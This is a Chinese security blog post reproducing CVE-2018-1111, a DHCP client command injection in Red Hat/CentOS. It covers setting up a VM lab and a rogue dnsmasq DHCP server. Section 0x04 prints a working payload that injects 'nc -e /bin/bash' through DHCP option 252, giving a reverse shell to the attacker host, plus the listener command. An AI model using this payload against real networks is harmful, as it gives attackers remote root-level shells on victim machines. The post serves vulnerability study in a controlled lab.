首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2018-1111复现环境搭建与dhcp命令注入

CVE-2018-1111复现环境搭建与dhcp命令注入

作者头像
FB客服
发布2018-12-28 10:44:31
6580
发布2018-12-28 10:44:31
举报
文章被收录于专栏:FreeBufFreeBuf

-*本文作者:m0nshaw,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

0x01 前言

最近留意到CVE-2018-1111这个洞,关于dhcp命令注入,便想复现一波。

DHCP是一个局域网的网络协议,主要用于内部网络动态IP地址分配。Red Hat提供的DHCP客户端软件包dhclient的脚本为/etc/NetworkManager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)和/etc/NetworkManager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6)。

当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。

最开始在Github上找到一个Docker的复现环境,尝试了各个docker镜像都发现漏洞已被patched掉了,无奈只能在VM上安装CentOS虚拟机。

https://github.com/knqyf263/CVE-2018-1111

关于漏洞成因,该文章已经分析的很清楚了,这里不再赘述。https://researchcenter.paloaltonetworks.com/2018/07/unit42-analysis-dhcp-client-script-code-execution-vulnerability-cve-2018-1111/

0x02 配置虚拟机网络

attacker: kali linux 2018 x64 192.168.71.5victim: Centos 7 x64 192.168.71.10

打开VM虚拟网络编辑器,设置仅主机模式(关掉dhcp,设置ip)。

将attacker、victim网络配置成仅主机模式:

0x003 搭建dhcp服务

先在kali下设置一下网络

ifconfig eth0 192.168.71.5 netmask 255.255.255.0

route add default gw 192.168.71.5

现在设置成192.168.71.5的ip。

在当前目录新建一个dnsmasq.conf文件,填入以下内容进行配置:

bind-interfaces

interface=eth0

except-interface=lo

dhcp-range=192.168.71.10,192.168.71.20,12h

dhcp-option=3,192.168.71.5

dhcp-option=6,192.168.71.5

log-queries

log-facility=/var/log/dnsmasq.log

参数解释:

dhcp-range: 表示要分配给客户机的 ip 地址范围和租约时间dhcp-option: 表示指定给 DHCP 客户端的选项信息log-facility: 表示日志记录器

其中配置文件中包括的 option 取值及含义如下:

3: 设置网关地址选项6: 设置 DNS 服务器地址选项252: 为 DHCP 客户端提供了一个用于配置其代理设置的 URL,wpad-proxy-url

payload 中涉及到的 option 252 是私人使用保留部分的一部分, 为 dhcp 服务器使用 252,然后在他们的浏览器中写入与 dhcp 服务器交谈的能力,并要求代码 252 从该选项列出的 URL 中获取关于网络上代理设置的信息。

这里 dnsmasq.conf中的dhcp-range设置:

为 192.168.71.10-192.168.71.20/24 这个 ip 地址范围,租约时间为 12h。

dhcp-option 3 网关地址和 dhcp-option6 DNS 服务器均设置为 kali 本地网卡的 ip 地址,kali 的 ip 地址为静态 ip。

0x04 命令注入

利用dnsmasq伪造dns服务器,命令执行 payload 如下:

dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.71.5 6666 #"

监听6666端口:

nc -l -p 6666 -v

重启CentOS的网络服务,然后shell就反弹回来了:

现在,CentOS的ip也是由我们伪造dhcp服务分配的(范围在192.168.71.10~192.168.71.20)。

*本文作者:m0nshaw,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-12-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 前言
  • 0x02 配置虚拟机网络
    • 0x003 搭建dhcp服务
    • 0x04 命令注入
    相关产品与服务
    容器服务
    腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档